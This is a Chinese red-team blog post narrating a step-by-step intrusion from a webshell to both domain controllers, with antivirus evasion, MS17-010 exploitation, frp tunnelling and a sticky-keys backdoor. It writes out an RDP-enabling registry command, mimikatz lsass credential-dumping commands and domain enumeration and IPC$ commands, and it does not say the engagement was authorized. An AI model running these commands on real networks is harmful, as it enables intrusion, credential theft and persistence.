Bypass趋势杀毒一步步打穿内网拿下域控

渗透攻击红队

一个专注于红队攻击的公众号

大家好，这里是 渗透攻击红队 的第 47 篇文章，本公众号会记录一些红队攻击的笔记（由浅到深），不定时更新

前言

首先是通过上传拿到了一个 webshell：

然后通过 Powershell 弹到我 C2 上发现是存在域环境，域名是：**ta.org.** ！

查看当前域内机器：

发现域控有多两台：

Ping 域控机器名得到域控 IP：192.168.30.110、192.168.30.111

tasklist /svc 发现当前机器存在趋势杀毒：

之后通过免杀上线到我 C2：

上线后做好免杀然后通过 Nbtscan 发现内网存活：

通过梼杌的插件提权失败后，然后我是先上传了 frp 先把流量代理出来：

代理成功：

然后 Metasploit 设置 socks5 代理：

通过扫了一遍内网 smb 存活发现内网 03 机器很多，猜测有 ms17010：

看来没猜错果然中奖了：

先打 08 这台把：192.168.30.116

但是失败了！

发现打 03 成功：192.168.30.8

没办法 03 只能通过执行命令，MSF 的模块没得 32 位的 Payload，我添加了一个 asp*** 用户进去：

然后开启了他的 3389 ：

REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

成功登录到他远程桌面：

通过信息搜集发现这台机器不出网：（这里说一下，测试出网大家可以使用 NC 看看目标是否出网，测试 TCP、UDP、DNS 这三种即可，因为如果底层的协议都不出网，你在测试一些其他协议出网也毫无意义！）

由于 03 服务器不能复制文件，我只能把文件通过映射到他的磁盘来传输文件：

老思路先克隆个 administrator 用户过来：

克隆后发现之前 administrator 之前执行了一些命令：

不管了，先用 procdump 把密码读出来：

然后拖会本地后删除文件：

最后使用 mimikatz 进行解密：

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

得到了 administrator 的明文密码：

   * Username : Administrator   * Domain   : *****DB   * Password : *****@dba

然后直接登录administrator 的机器：

然后把我之前创建的 asp***** 用户删除：

通过搜集信息的时候发现了 11 年这台机器的 rdp 记录：

但是连接不上：

然后再这台机器上没找到可利用的信息后，随手留了一个粘滞键的后门：

之后扫描内网 HTTP 服务的时候发现了一个投影仪系统，弱口令撸了进去：admin:admin

由于搞站的时候比较晚了，搞到这我就去睡觉了。

就在昨晚睡着，做了一个梦，梦到我上课迟到了，然后回到座位上看到我作业上一个 Metasploit 的 Shell，然后就醒了！

睡醒后的，我再一次拿起 MSF 打了一遍 08 的机器，结果成功了？卧槽这个梦牛逼啊！

这尼玛渗透有时候就需要天时地利人和！

通过 Ping google 发现 192.168.30.116 能出网：

然后创建个管理员用户 asp****:

登录到他远程桌面：

随后克隆用户 adminisrtrator：

随后做了免杀让他上线到我 CS：

之后抓到了一个域用户的 hash：

beacon> logonpasswords[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command[+] host called home, sent: 438866 bytes[+] received output:
Authentication Id : 0 ; 996 (00000000:000003e4)Session           : Service from 0User Name         : ****DSM$Domain            : ****ALogon Server      : (null)Logon Time        : 2021/1/27 上午 12:22:29SID               : S-1-5-20  msv :     [00000003] Primary   * Username : ****ADSM$   * Domain   : ****A   * NTLM     : 0a4b2******************************   * SHA1     : 623e30**************************

这个时候由于我们是一个工作组用户，得想办法搞到一个域用户！

通过 MSF 的令牌窃取：

发现失败了：

回头看看 Win 10 这台，使用 getsystem 直接提取成功了：

之后通过注入 System 进程成功反弹一个 System 的shell：

之后发现进程里还有其他的域用户：

再注入进程得到一个域用户的 shell：

最后抓一下密码：

然后通过定位域管 ：

shell net group "domain admins" /domain

发现域管的账号是 A013，发现也在进程里，直接注入进程上线成功：

先查看域控是那些机器：

shell net group "domain controllers" /domain

发现域控有两台！然后通过 Ping 域控的主机名：****DC01、****DC02

得到域控的 IP：192.168.30.110、192.168.30.111

然后和域控建立 IPC$:

shell net use \\****DC01\ipc$shell net use \\****DC02\ipc$

有域管进程就好办了，直接窃取令牌，直接拿域控横向上线：（因为域管本来就可以直接和任何机器建立连接，并且都是最大权限，所以不需要密码）

成功上线域控：

最后通过注入进程成功上线域管理员账号：

至此域渗透完结：

他内网其实还有很多机器还可以打，一些 Web 比如 Tomcat，Weblogic，Jboss 一些漏洞还是可以利用打下来的，由于我的目标就是拿到域控所以就不深入了。

点分享

点点赞

点在看